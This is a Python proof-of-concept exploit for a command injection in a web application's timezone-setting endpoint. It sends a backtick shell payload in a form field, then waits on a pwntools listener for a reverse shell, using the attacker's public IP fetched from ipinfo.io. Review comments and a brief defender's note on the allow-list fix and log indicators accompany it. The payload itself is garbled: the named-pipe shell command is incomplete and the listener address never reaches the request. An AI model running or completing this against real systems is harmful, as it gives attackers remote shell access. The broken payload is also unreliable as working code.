#!/usr/bin/python3
"""Proof-of-concept for an OS command injection in the ``management/set_timezone``
endpoint of a web application (product not named in this file).

The ``timezone`` form field is submitted containing a backtick-quoted shell
command; the payload relies on the server side handing that value to a shell
instead of validating it against the fixed set of zone names. A pwntools
listener is opened before the request is sent, and the script then waits for
an inbound connection.

Defender's notes: the application-side fix is to accept only zone names from
a known list and never pass the value to a shell; in web-server logs the
request stands out by shell metacharacters (backticks, ``;``) in the
``timezone`` parameter of a POST to this endpoint.

NOTE(review): the original file had lost its line breaks and indentation;
the layout below is reconstructed from statement order only.
"""
import requests
import argparse
import json  # NOTE(review): not referenced anywhere in this file
from pwn import *  # provides listen(); presumably also the `sys` used below -- confirm


def exploit(target: str, localhost: str, localport: str) -> None:
    """Send the injection payload to ``target``.

    Args:
        target: Base URL of the application (e.g. ``http://host:9000``); it is
            joined directly into the endpoint URL, Origin and Referer.
        localhost: Listener address. Not referenced in this body.
        localport: Listener port. Not referenced in this body.

    Returns:
        None. The HTTP response is discarded and any exception is swallowed.
    """
    url = f'{target}/index.php/management/set_timezone'
    # Browser-like request headers; X-Requested-With marks the POST as an XHR.
    headers = {
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'Origin': f'{target}',
        'Referer': f'{target}/index.php/management/datetime',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en-US,en;q=0.9',
        'Connection': 'close'
    }
    # The injected value: a backtick command substitution inside the form field.
    # NOTE(review): this f-string has no placeholders, so localhost and
    # localport never reach the request.
    data = {
        'timezone': f'`mknod /tmp/pipe p;/bin/sh 0/tmp/pipe`'
    }
    try:
        # Short timeout; the response is assigned but never inspected.
        response = requests.post(url, headers=headers, data=data, timeout=3)
    except:
        # NOTE(review): a bare except also hides DNS/connection errors and
        # KeyboardInterrupt, so a wrong --target fails silently. Catching
        # requests.RequestException would keep the intended best-effort
        # behaviour while letting real mistakes surface.
        pass


def get_external_ip():
    """Look up this host's public IP via ipinfo.io, used as the listener address.

    Returns:
        The ``ip`` field of the JSON reply when the status is 200. For any
        other status a 3-tuple (label, status code, message) is returned
        instead of a string.

    Raises:
        requests.RequestException on network failure (no timeout is set);
        KeyError if the reply carries no ``ip`` field.
    """
    endpoint = 'https://ipinfo.io/json'
    # TLS verification is explicitly on. No timeout, so this can block indefinitely.
    response = requests.get(endpoint, verify = True)
    if response.status_code != 200:
        # NOTE(review): returns a tuple, which the caller then stores as the
        # listener address. The exit() below sits after the return and can
        # never run; raising an exception here would let the caller's
        # except branch handle the failure as intended.
        return 'Status:', response.status_code, 'Problem with the request. Exiting.'
        exit()
    data = response.json()
    return data['ip']


if __name__ == "__main__":
    # Parse arguments. --target is required, so its default=False is never
    # observed and the `is not False` check below is always true.
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", action="store", help="Target url, http://localhost:9000", default=False, required=True)
    parser.add_argument("-l", "--localhost", action="store", help="Local IP address for reverse shell", default=False)
    parser.add_argument("-p", "--localport", action="store", help="Local port for reverse shell", default="443")
    args = parser.parse_args()
    if args.target is not False:
        if args.localhost is False:
            # No listener address given: fall back to the public IP lookup.
            try:
                args.localhost = get_external_ip()
            except:
                # NOTE(review): bare except; the non-200 tuple return of
                # get_external_ip() does not raise and so is not caught here.
                print("Not able to get external IP address")
                sys.exit(1)
        # Start the listener first so the connection cannot be missed.
        # args.localport is a str here; presumably listen() converts it -- confirm.
        l = listen(args.localport)
        # Send the injection request (return value and errors are discarded).
        exploit(args.target,args.localhost,args.localport)
        # Block until a connection arrives, then hand the session to the terminal.
        try:
            s = l.wait_for_connection()
            s.interactive()
        except:
            # NOTE(review): bare except swallows KeyboardInterrupt as well;
            # the listener is still closed by the finally clause.
            pass
        finally:
            l.close()
    else:
        parser.print_help()
        parser.exit()